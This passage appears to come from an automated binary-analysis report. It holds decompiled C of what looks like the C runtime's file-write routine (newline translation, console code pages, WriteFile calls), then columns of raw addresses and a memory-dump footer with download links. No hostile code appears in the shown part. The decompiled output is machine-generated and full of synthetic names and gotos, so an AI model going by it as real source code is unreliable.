										_v6892 = 0xa;
										do {
											_v6888 = _v6888 & 0x00000000;
											_t419 = _v6872;
											_t284 = _t379 - _t405;
											__eflags = _t284;
											_t408 = _v6888;
											_t364 =  &_v6844;
											do {
												__eflags = _t284 - _a12;
												if(_t284 >= _a12) {
													break;
												}
												_t429 =  *_t379 & 0x0000ffff;
												_t379 = _t379 + 2;
												_t284 = _t284 + 2;
												_v6852 = _t379;
												__eflags = _t429 - _v6892;
												if(_t429 == _v6892) {
													_t388 = 0xd;
													 *_t364 = _t388;
													_t379 = _v6852;
													_t419 = _t419 + 2;
													_t364 =  &(_t364[0]);
													_t408 = _t408 + 2;
													__eflags = _t408;
												}
												 *_t364 = _t429;
												_t408 = _t408 + 2;
												_t364 =  &(_t364[0]);
												__eflags = _t408 - 0x13fe;
											} while (_t408 < 0x13fe);
											_t365 = _t364 -  &_v6844;
											_v6872 = _t419;
											_t290 = WriteFile( *(_v6896 +  *((intOrPtr*)(0x457610 + _v6868 * 4))),  &_v6844, _t365,  &_v6876, 0);
											_t425 = _v6860;
											_t416 = _v6856;
											__eflags = _t290;
											if(_t290 == 0) {
												goto L92;
											}
											_t416 = _t416 + _v6876;
											_t405 = _v6848;
											_v6856 = _t416;
											__eflags = _v6876 - _t365;
											if(_v6876 < _t365) {
												goto L94;
											}
											_t379 = _v6852;
											__eflags = _t379 - _t405 - _a12;
										} while (_t379 - _t405 < _a12);
										goto L94;
									}
									_t293 = _t405;
									_v6856 = _t293;
									__eflags = _a12;
									if(_a12 <= 0) {
										goto L99;
									} else {
										goto L53;
									}
									do {
										L53:
										_t294 = _t293 - _t405;
										__eflags = _t294;
										_t409 = _v6856;
										_t366 =  &_v6844;
										_v6852 = 0;
										do {
											__eflags = _t294 - _a12;
											if(_t294 >= _a12) {
												break;
											}
											_t391 =  *_t409;
											_t294 = _t294 + 1;
											_v6881 = _t391;
											__eflags = _t391 - 0xa;
											_t392 = _v6852;
											_v6856 = _t409 + 1;
											if(_t391 == 0xa) {
												_v6872 = _v6872 + 1;
												 *_t366 = 0xd;
												_t366 = _t366 + 1;
												_t392 = _t392 + 1;
												__eflags = _t392;
											}
											 *_t366 = _v6881;
											_t409 = _v6856;
											_t366 = _t366 + 1;
											_t393 = _t392 + 1;
											_v6852 = _t393;
											__eflags = _t393 - 0x13ff;
										} while (_t393 < 0x13ff);
										_t367 = _t366 -  &_v6844;
										_t300 = WriteFile( *(_v6896 +  *((intOrPtr*)(0x457610 + _v6868 * 4))),  &_v6844, _t367,  &_v6876, 0);
										__eflags = _t300;
										if(_t300 == 0) {
											goto L92;
										}
										_t416 = _t416 + _v6876;
										_t405 = _v6848;
										__eflags = _v6876 - _t367;
										if(_v6876 < _t367) {
											goto L94;
										}
										__eflags = _v6856 - _t405 - _a12;
										_t293 = _v6856;
									} while (_v6856 - _t405 < _a12);
									goto L94;
								} else {
									_t304 =  *((intOrPtr*)(0x457610 + _v6868 * 4));
									__eflags =  *(_t424 + _t304 + 4) & 0x00000080;
									if(( *(_t424 + _t304 + 4) & 0x00000080) == 0) {
										goto L50;
									}
									_t305 = E00429471();
									__eflags =  *( *((intOrPtr*)(_t305 + 0x6c)) + 0xa8);
									_v6852 = 0 |  *( *((intOrPtr*)(_t305 + 0x6c)) + 0xa8) == 0x00000000;
									_t310 = GetConsoleMode( *(_t424 +  *((intOrPtr*)(0x457610 + _v6868 * 4))),  &_v6888);
									__eflags = _t310;
									if(_t310 == 0) {
										goto L50;
									}
									__eflags = _v6852 - _t416;
									if(_v6852 == _t416) {
										L16:
										_t311 = GetConsoleCP();
										_t405 = _v6848;
										_v6880 = _v6880 & _t416;
										_t396 = _t405;
										_v6900 = _t311;
										_v6864 = _t396;
										__eflags = _a12 - _t416;
										if(_a12 <= _t416) {
											_t425 = _v6852;
											L95:
											__eflags = _t425;
											if(_t425 == 0) {
												L99:
												_t377 = _v6896;
												_t265 =  *((intOrPtr*)(0x457610 + _v6868 * 4));
												__eflags =  *(_t377 + _t265 + 4) & 0x00000040;
												if(( *(_t377 + _t265 + 4) & 0x00000040) == 0) {
													L102:
													 *((intOrPtr*)(E0042AD46())) = 0x1c;
													_t267 = E0042AD12();
													 *_t267 =  *_t267 & 0x00000000;
													__eflags =  *_t267;
													L103:
													_t262 = _t267 | 0xffffffff;
													L105:
													_pop(_t421);
													L106:
													return L004267AF(_t262, _v8 ^ _t430, _t416, _t421);
												}
												__eflags =  *_t405 - 0x1a;
												if( *_t405 != 0x1a) {
													goto L102;
												}
												_t262 = 0;
												goto L105;
											}
											_t362 = 5;
											__eflags = _t425 - _t362;
											if(_t425 != _t362) {
												_t267 = E0042AD25(_t425);
											} else {
												 *((intOrPtr*)(E0042AD46())) = 9;
												_t267 = E0042AD12();
												 *_t267 = _t362;
											}
											goto L103;
										}
										__eflags = 0;
										_v6860 = 0;
										_v6892 = 0xa;
										do {
											__eflags = _t360;
											if(_t360 != 0) {
												__eflags = _t360 - 1;
												if(_t360 == 1) {
													L37:
													_t313 =  *_t396 & 0x0000ffff;
													__eflags = _t313 - _v6892;
													_v6856 = _t313;
													_t396 =  &(_t396[1]);
													_t315 = _v6860 + 2;
													__eflags = _t315;
													_v6864 = _t396;
													_v6860 = _t315;
													_v6852 = 0 | _t313 == _v6892;
													L38:
													__eflags = _t360 - 1;
													if(_t360 == 1) {
														L40:
														_t316 = E0042F6EE(_t396, _v6856);
														_pop(_t397);
														__eflags = _t316 - _v6856;
														if(_t316 != _v6856) {
															L92:
															_t425 = GetLastError();
															L93:
															_t405 = _v6848;
															L94:
															__eflags = _t416;
															if(_t416 != 0) {
																_t416 = _t416 - _v6872;
																__eflags = _t416;
																_t262 = _t416;
																goto L105;
															}
															goto L95;
														}
														_t416 = _t416 + 2;
														__eflags = _v6852;
														if(_v6852 == 0) {
															L44:
															_t315 = _v6860;
															_t396 = _v6864;
															goto L45;
														}
														_t349 = 0xd;
														_v6856 = _t349;
														_t350 = E0042F6EE(_t397, _t349);
														__eflags = _t350 - _v6856;
														if(_t350 != _v6856) {
															goto L92;
														}
														_t416 = _t416 + 1;
														_t118 =  &_v6872;
														 *_t118 = _v6872 + 1;
														__eflags =  *_t118;
														goto L44;
													}
													__eflags = _t360 - 2;
													if(_t360 != 2) {
														goto L45;
													}
													goto L40;
												}
												__eflags = _t360 - 2;
												if(_t360 != 2) {
													goto L38;
												}
												goto L37;
											}
											_t398 =  *_t396;
											__eflags = _t398 - 0xa;
											_v6852 = 0 | _t398 == 0x0000000a;
											_t414 =  *((intOrPtr*)(0x457610 + _v6868 * 4));
											__eflags =  *(_t424 + _t414 + 0x38);
											if( *(_t424 + _t414 + 0x38) == 0) {
												_t321 = E0042E35D(_t398);
												__eflags = _t321;
												if(_t321 == 0) {
													_push(1);
													_push(_v6864);
													L26:
													_push( &_v6856);
													_t323 = E0042F6D6();
													_t431 = _t431 + 0xc;
													__eflags = _t323 - 0xffffffff;
													if(_t323 == 0xffffffff) {
														L48:
														_t425 = _v6852;
														goto L93;
													}
													_t324 = _v6864;
													L28:
													_v6860 = _v6860 + 1;
													_v6864 = _t324 + 1;
													_t328 = WideCharToMultiByte(_v6900, 0,  &_v6856, 1,  &_v16, 5, 0, 0);
													_v6888 = _t328;
													__eflags = _t328;
													if(_t328 == 0) {
														goto L48;
													}
													_t332 = WriteFile( *(_t424 +  *((intOrPtr*)(0x457610 + _v6868 * 4))),  &_v16, _t328,  &_v6880, 0);
													__eflags = _t332;
													if(_t332 == 0) {
														goto L92;
													}
													_t416 = _v6860 + _v6872;
													__eflags = _v6880 - _v6888;
													if(_v6880 < _v6888) {
														goto L48;
													}
													__eflags = _v6852;
													if(_v6852 == 0) {
														goto L44;
													}
													_v16 = 0xd;
													_t338 = WriteFile( *(_t424 +  *((intOrPtr*)(0x457610 + _v6868 * 4))),  &_v16, 1,  &_v6880, 0);
													__eflags = _t338;
													if(_t338 == 0) {
														goto L92;
													}
													__eflags = _v6880 - 1;
													if(_v6880 < 1) {
														goto L48;
													}
													_v6872 = _v6872 + 1;
													_t416 = _t416 + 1;
													goto L44;
												}
												_t415 = _v6864;
												__eflags = _v6848 - _t415 + _a12 - 1;
												if(_v6848 - _t415 + _a12 <= 1) {
													_t368 = _v6868;
													_t416 = _t416 + 1;
													__eflags = _t416;
													 *((char*)(_t424 +  *((intOrPtr*)(0x457610 + _t368 * 4)) + 0x34)) =  *_t415;
													 *(_t424 +  *((intOrPtr*)(0x457610 + _t368 * 4)) + 0x38) = 1;
													goto L48;
												}
												_t345 = E0042F6D6( &_v6856, _t415, 2);
												_t431 = _t431 + 0xc;
												__eflags = _t345 - 0xffffffff;
												if(_t345 == 0xffffffff) {
													goto L48;
												}
												_t324 = _v6864 + 1;
												_v6860 = _v6860 + 1;
												goto L28;
											}
											_v16 =  *((intOrPtr*)(_t424 + _t414 + 0x34));
											_push(2);
											_v15 = _t398;
											 *(_t424 + _t414 + 0x38) =  *(_t424 + _t414 + 0x38) & 0x00000000;
											_push( &_v16);
											goto L26;
											L45:
											__eflags = _t315 - _a12;
										} while (_t315 < _a12);
										goto L48;
									}
									__eflags = _t360;
									if(_t360 == 0) {
										goto L50;
									}
									goto L16;
								}
							}
							 *(E0042AD12()) =  *_t352 & _t416;
							 *((intOrPtr*)(E0042AD46())) = 0x16;
							_t267 = E0042ACD7();
							goto L103;
						}
						__eflags = _t360 - 1;
						if(_t360 != 1) {
							goto L9;
						}
						goto L6;
					}
					 *(E0042AD12()) =  *_t354 & 0;
					 *((intOrPtr*)(E0042AD46())) = 0x16;
					_t262 = E0042ACD7() | 0xffffffff;
					goto L106;
				}
				_t262 = 0;
				goto L106;
			}


































































































                                                                                                                                                                  0x0042d94a
                                                                                                                                                                  0x0042d952
                                                                                                                                                                  0x0042d957
                                                                                                                                                                  0x0042d95e
                                                                                                                                                                  0x0042d961
                                                                                                                                                                  0x0042d964
                                                                                                                                                                  0x0042d96a
                                                                                                                                                                  0x0042d96c
                                                                                                                                                                  0x0042d972
                                                                                                                                                                  0x0042d978
                                                                                                                                                                  0x0042d97e
                                                                                                                                                                  0x0042d987
                                                                                                                                                                  0x0042d990
                                                                                                                                                                  0x0042d992
                                                                                                                                                                  0x0042d9b4
                                                                                                                                                                  0x0042d9b7
                                                                                                                                                                  0x0042d9bf
                                                                                                                                                                  0x0042d9c2
                                                                                                                                                                  0x0042d9c8
                                                                                                                                                                  0x0042d9cf
                                                                                                                                                                  0x0042d9db
                                                                                                                                                                  0x0042d9dd
                                                                                                                                                                  0x0042d9e0
                                                                                                                                                                  0x0042d9e7
                                                                                                                                                                  0x0042d9ea
                                                                                                                                                                  0x0042d9ec
                                                                                                                                                                  0x0042d9ee
                                                                                                                                                                  0x0042da0c
                                                                                                                                                                  0x0042da12
                                                                                                                                                                  0x0042da12
                                                                                                                                                                  0x0042da17
                                                                                                                                                                  0x0042da1e
                                                                                                                                                                  0x0042da23
                                                                                                                                                                  0x0042da23
                                                                                                                                                                  0x0042da2c
                                                                                                                                                                  0x0042da32
                                                                                                                                                                  0x0042da34
                                                                                                                                                                  0x0042dd52
                                                                                                                                                                  0x0042dd58
                                                                                                                                                                  0x0042dd5f
                                                                                                                                                                  0x0042dd64
                                                                                                                                                                  0x0042e0d4
                                                                                                                                                                  0x0042e0da
                                                                                                                                                                  0x0042e0dc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042e0de
                                                                                                                                                                  0x0042e0e4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042e0e4
                                                                                                                                                                  0x0042dd6a
                                                                                                                                                                  0x0042dd70
                                                                                                                                                                  0x0042dd72
                                                                                                                                                                  0x0042dd78
                                                                                                                                                                  0x0042dd7a
                                                                                                                                                                  0x0042de61
                                                                                                                                                                  0x0042de63
                                                                                                                                                                  0x0042de66
                                                                                                                                                                  0x0042df6a
                                                                                                                                                                  0x0042df6d
                                                                                                                                                                  0x0042df73
                                                                                                                                                                  0x0042df75
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042df7b
                                                                                                                                                                  0x0042df85
                                                                                                                                                                  0x0042df85
                                                                                                                                                                  0x0042df8c
                                                                                                                                                                  0x0042df92
                                                                                                                                                                  0x0042df92
                                                                                                                                                                  0x0042df94
                                                                                                                                                                  0x0042df9a
                                                                                                                                                                  0x0042dfa0
                                                                                                                                                                  0x0042dfa0
                                                                                                                                                                  0x0042dfa2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042dfa4
                                                                                                                                                                  0x0042dfa7
                                                                                                                                                                  0x0042dfaa
                                                                                                                                                                  0x0042dfad
                                                                                                                                                                  0x0042dfb3
                                                                                                                                                                  0x0042dfba
                                                                                                                                                                  0x0042dfbe
                                                                                                                                                                  0x0042dfbf
                                                                                                                                                                  0x0042dfc2
                                                                                                                                                                  0x0042dfc8
                                                                                                                                                                  0x0042dfcb
                                                                                                                                                                  0x0042dfcb
                                                                                                                                                                  0x0042dfcb
                                                                                                                                                                  0x0042dfce
                                                                                                                                                                  0x0042dfd1
                                                                                                                                                                  0x0042dfd4
                                                                                                                                                                  0x0042dfd7
                                                                                                                                                                  0x0042dfd7
                                                                                                                                                                  0x0042dff7
                                                                                                                                                                  0x0042e006
                                                                                                                                                                  0x0042e00c
                                                                                                                                                                  0x0042e012
                                                                                                                                                                  0x0042e018
                                                                                                                                                                  0x0042e01e
                                                                                                                                                                  0x0042e020
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042e026
                                                                                                                                                                  0x0042e026
                                                                                                                                                                  0x0042e028
                                                                                                                                                                  0x0042e02e
                                                                                                                                                                  0x0042e059
                                                                                                                                                                  0x0042e05f
                                                                                                                                                                  0x0042e061
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042e069
                                                                                                                                                                  0x0042e06f
                                                                                                                                                                  0x0042e075
                                                                                                                                                                  0x0042e07b
                                                                                                                                                                  0x0042e07d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042e09b
                                                                                                                                                                  0x0042e09b
                                                                                                                                                                  0x0042e09d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042e09d
                                                                                                                                                                  0x0042e081
                                                                                                                                                                  0x0042e087
                                                                                                                                                                  0x0042e08d
                                                                                                                                                                  0x0042e08f
                                                                                                                                                                  0x0042e095
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042e09f
                                                                                                                                                                  0x0042e09f
                                                                                                                                                                  0x0042e0a5
                                                                                                                                                                  0x0042e0ad
                                                                                                                                                                  0x0042e0af
                                                                                                                                                                  0x0042e0b5
                                                                                                                                                                  0x0042e0b5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042e0bd
                                                                                                                                                                  0x0042de6c
                                                                                                                                                                  0x0042de72
                                                                                                                                                                  0x0042de75
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042de7b
                                                                                                                                                                  0x0042de85
                                                                                                                                                                  0x0042de85
                                                                                                                                                                  0x0042de8c
                                                                                                                                                                  0x0042de94
                                                                                                                                                                  0x0042de94
                                                                                                                                                                  0x0042de96
                                                                                                                                                                  0x0042de9c
                                                                                                                                                                  0x0042dea2
                                                                                                                                                                  0x0042dea2
                                                                                                                                                                  0x0042dea5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042dea7
                                                                                                                                                                  0x0042deaa
                                                                                                                                                                  0x0042dead
                                                                                                                                                                  0x0042deb0
                                                                                                                                                                  0x0042deb6
                                                                                                                                                                  0x0042debd
                                                                                                                                                                  0x0042dec1
                                                                                                                                                                  0x0042dec2
                                                                                                                                                                  0x0042dec5
                                                                                                                                                                  0x0042decb
                                                                                                                                                                  0x0042dece
                                                                                                                                                                  0x0042ded1
                                                                                                                                                                  0x0042ded1
                                                                                                                                                                  0x0042ded1
                                                                                                                                                                  0x0042ded4
                                                                                                                                                                  0x0042ded7
                                                                                                                                                                  0x0042deda
                                                                                                                                                                  0x0042dedd
                                                                                                                                                                  0x0042dedd
                                                                                                                                                                  0x0042def1
                                                                                                                                                                  0x0042df0a
                                                                                                                                                                  0x0042df1a
                                                                                                                                                                  0x0042df20
                                                                                                                                                                  0x0042df26
                                                                                                                                                                  0x0042df2c
                                                                                                                                                                  0x0042df2e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042df34
                                                                                                                                                                  0x0042df3a
                                                                                                                                                                  0x0042df40
                                                                                                                                                                  0x0042df46
                                                                                                                                                                  0x0042df4c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042df52
                                                                                                                                                                  0x0042df5c
                                                                                                                                                                  0x0042df5c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042df65
                                                                                                                                                                  0x0042dd80
                                                                                                                                                                  0x0042dd82
                                                                                                                                                                  0x0042dd88
                                                                                                                                                                  0x0042dd8b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042dd91
                                                                                                                                                                  0x0042dd91
                                                                                                                                                                  0x0042dd93
                                                                                                                                                                  0x0042dd93
                                                                                                                                                                  0x0042dd95
                                                                                                                                                                  0x0042dd9b
                                                                                                                                                                  0x0042dda1
                                                                                                                                                                  0x0042dda7
                                                                                                                                                                  0x0042dda7
                                                                                                                                                                  0x0042ddaa
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042ddac
                                                                                                                                                                  0x0042ddaf
                                                                                                                                                                  0x0042ddb0
                                                                                                                                                                  0x0042ddb6
                                                                                                                                                                  0x0042ddb9
                                                                                                                                                                  0x0042ddbf
                                                                                                                                                                  0x0042ddc5
                                                                                                                                                                  0x0042ddc7
                                                                                                                                                                  0x0042ddcd
                                                                                                                                                                  0x0042ddd0
                                                                                                                                                                  0x0042ddd1
                                                                                                                                                                  0x0042ddd1
                                                                                                                                                                  0x0042ddd1
                                                                                                                                                                  0x0042ddd8
                                                                                                                                                                  0x0042ddda
                                                                                                                                                                  0x0042dde0
                                                                                                                                                                  0x0042dde1
                                                                                                                                                                  0x0042dde2
                                                                                                                                                                  0x0042dde8
                                                                                                                                                                  0x0042dde8
                                                                                                                                                                  0x0042ddfc
                                                                                                                                                                  0x0042de1f
                                                                                                                                                                  0x0042de25
                                                                                                                                                                  0x0042de27
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042de2d
                                                                                                                                                                  0x0042de33
                                                                                                                                                                  0x0042de39
                                                                                                                                                                  0x0042de3f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042de4d
                                                                                                                                                                  0x0042de50
                                                                                                                                                                  0x0042de50
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042da3a
                                                                                                                                                                  0x0042da40
                                                                                                                                                                  0x0042da47
                                                                                                                                                                  0x0042da4c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042da52
                                                                                                                                                                  0x0042da5c
                                                                                                                                                                  0x0042da7c
                                                                                                                                                                  0x0042da82
                                                                                                                                                                  0x0042da88
                                                                                                                                                                  0x0042da8a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042da90
                                                                                                                                                                  0x0042da96
                                                                                                                                                                  0x0042daa0
                                                                                                                                                                  0x0042daa0
                                                                                                                                                                  0x0042daa6
                                                                                                                                                                  0x0042daac
                                                                                                                                                                  0x0042dab2
                                                                                                                                                                  0x0042dab4
                                                                                                                                                                  0x0042daba
                                                                                                                                                                  0x0042dac0
                                                                                                                                                                  0x0042dac3
                                                                                                                                                                  0x0042dd47
                                                                                                                                                                  0x0042e0fa
                                                                                                                                                                  0x0042e0fa
                                                                                                                                                                  0x0042e0fc
                                                                                                                                                                  0x0042e122
                                                                                                                                                                  0x0042e128
                                                                                                                                                                  0x0042e12e
                                                                                                                                                                  0x0042e135
                                                                                                                                                                  0x0042e13a
                                                                                                                                                                  0x0042e145
                                                                                                                                                                  0x0042e14a
                                                                                                                                                                  0x0042e150
                                                                                                                                                                  0x0042e155
                                                                                                                                                                  0x0042e155
                                                                                                                                                                  0x0042e158
                                                                                                                                                                  0x0042e158
                                                                                                                                                                  0x0042e165
                                                                                                                                                                  0x0042e165
                                                                                                                                                                  0x0042e167
                                                                                                                                                                  0x0042e173
                                                                                                                                                                  0x0042e173
                                                                                                                                                                  0x0042e13c
                                                                                                                                                                  0x0042e13f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042e141
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042e141
                                                                                                                                                                  0x0042e100
                                                                                                                                                                  0x0042e101
                                                                                                                                                                  0x0042e103
                                                                                                                                                                  0x0042e11a
                                                                                                                                                                  0x0042e105
                                                                                                                                                                  0x0042e10a
                                                                                                                                                                  0x0042e110
                                                                                                                                                                  0x0042e115
                                                                                                                                                                  0x0042e115
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042e103
                                                                                                                                                                  0x0042dac9
                                                                                                                                                                  0x0042dacb
                                                                                                                                                                  0x0042dad1
                                                                                                                                                                  0x0042dadb
                                                                                                                                                                  0x0042dadb
                                                                                                                                                                  0x0042dadd
                                                                                                                                                                  0x0042dc72
                                                                                                                                                                  0x0042dc75
                                                                                                                                                                  0x0042dc7c
                                                                                                                                                                  0x0042dc7c
                                                                                                                                                                  0x0042dc81
                                                                                                                                                                  0x0042dc88
                                                                                                                                                                  0x0042dc97
                                                                                                                                                                  0x0042dc9a
                                                                                                                                                                  0x0042dc9a
                                                                                                                                                                  0x0042dc9d
                                                                                                                                                                  0x0042dca3
                                                                                                                                                                  0x0042dca9
                                                                                                                                                                  0x0042dcaf
                                                                                                                                                                  0x0042dcaf
                                                                                                                                                                  0x0042dcb2
                                                                                                                                                                  0x0042dcb9
                                                                                                                                                                  0x0042dcbf
                                                                                                                                                                  0x0042dcc4
                                                                                                                                                                  0x0042dcc5
                                                                                                                                                                  0x0042dccc
                                                                                                                                                                  0x0042e0e8
                                                                                                                                                                  0x0042e0ee
                                                                                                                                                                  0x0042e0f0
                                                                                                                                                                  0x0042e0f0
                                                                                                                                                                  0x0042e0f6
                                                                                                                                                                  0x0042e0f6
                                                                                                                                                                  0x0042e0f8
                                                                                                                                                                  0x0042e15d
                                                                                                                                                                  0x0042e15d
                                                                                                                                                                  0x0042e163
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042e163
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042e0f8
                                                                                                                                                                  0x0042dcd2
                                                                                                                                                                  0x0042dcd5
                                                                                                                                                                  0x0042dcdc
                                                                                                                                                                  0x0042dd02
                                                                                                                                                                  0x0042dd02
                                                                                                                                                                  0x0042dd08
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042dd08
                                                                                                                                                                  0x0042dce0
                                                                                                                                                                  0x0042dce2
                                                                                                                                                                  0x0042dce8
                                                                                                                                                                  0x0042dcee
                                                                                                                                                                  0x0042dcf5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042dcfb
                                                                                                                                                                  0x0042dcfc
                                                                                                                                                                  0x0042dcfc
                                                                                                                                                                  0x0042dcfc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042dcfc
                                                                                                                                                                  0x0042dcb4
                                                                                                                                                                  0x0042dcb7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042dcb7
                                                                                                                                                                  0x0042dc77
                                                                                                                                                                  0x0042dc7a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042dc7a
                                                                                                                                                                  0x0042dae3
                                                                                                                                                                  0x0042dae7
                                                                                                                                                                  0x0042daed
                                                                                                                                                                  0x0042daf9
                                                                                                                                                                  0x0042db00
                                                                                                                                                                  0x0042db05
                                                                                                                                                                  0x0042db22
                                                                                                                                                                  0x0042db28
                                                                                                                                                                  0x0042db2a
                                                                                                                                                                  0x0042db70
                                                                                                                                                                  0x0042db72
                                                                                                                                                                  0x0042db78
                                                                                                                                                                  0x0042db7e
                                                                                                                                                                  0x0042db7f
                                                                                                                                                                  0x0042db84
                                                                                                                                                                  0x0042db87
                                                                                                                                                                  0x0042db8a
                                                                                                                                                                  0x0042dd3c
                                                                                                                                                                  0x0042dd3c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042dd3c
                                                                                                                                                                  0x0042db90
                                                                                                                                                                  0x0042db96
                                                                                                                                                                  0x0042db9b
                                                                                                                                                                  0x0042dba3
                                                                                                                                                                  0x0042dbbd
                                                                                                                                                                  0x0042dbc3
                                                                                                                                                                  0x0042dbc9
                                                                                                                                                                  0x0042dbcb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042dbef
                                                                                                                                                                  0x0042dbf5
                                                                                                                                                                  0x0042dbf7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042dc09
                                                                                                                                                                  0x0042dc0f
                                                                                                                                                                  0x0042dc15
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042dc1b
                                                                                                                                                                  0x0042dc22
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042dc3d
                                                                                                                                                                  0x0042dc4b
                                                                                                                                                                  0x0042dc51
                                                                                                                                                                  0x0042dc53
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042dc59
                                                                                                                                                                  0x0042dc60
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042dc66
                                                                                                                                                                  0x0042dc6c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042dc6c
                                                                                                                                                                  0x0042db32
                                                                                                                                                                  0x0042db3d
                                                                                                                                                                  0x0042db40
                                                                                                                                                                  0x0042dd19
                                                                                                                                                                  0x0042dd28
                                                                                                                                                                  0x0042dd28
                                                                                                                                                                  0x0042dd29
                                                                                                                                                                  0x0042dd34
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042dd34
                                                                                                                                                                  0x0042db50
                                                                                                                                                                  0x0042db55
                                                                                                                                                                  0x0042db58
                                                                                                                                                                  0x0042db5b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042db67
                                                                                                                                                                  0x0042db68
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042db68
                                                                                                                                                                  0x0042db0b
                                                                                                                                                                  0x0042db0e
                                                                                                                                                                  0x0042db13
                                                                                                                                                                  0x0042db16
                                                                                                                                                                  0x0042db1b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042dd0e
                                                                                                                                                                  0x0042dd0e
                                                                                                                                                                  0x0042dd0e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042dd17
                                                                                                                                                                  0x0042da98
                                                                                                                                                                  0x0042da9a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042da9a
                                                                                                                                                                  0x0042da34
                                                                                                                                                                  0x0042d9f5
                                                                                                                                                                  0x0042d9fc
                                                                                                                                                                  0x0042da02
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042da02
                                                                                                                                                                  0x0042d9e2
                                                                                                                                                                  0x0042d9e5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042d9e5
                                                                                                                                                                  0x0042d999
                                                                                                                                                                  0x0042d9a0
                                                                                                                                                                  0x0042d9ab
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042d9ab
                                                                                                                                                                  0x0042d989
                                                                                                                                                                  0x00000000

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 2cd571c46d921342ae328bc226716b59bec4f1646cf6de2fc2b105e6fd3e42bb
                                                                                                                                                                  • Instruction ID: 891cd7d9590e1a7e1ffb108c77c810cdab370ba3ef007c3d29cf8127fac5fbb5
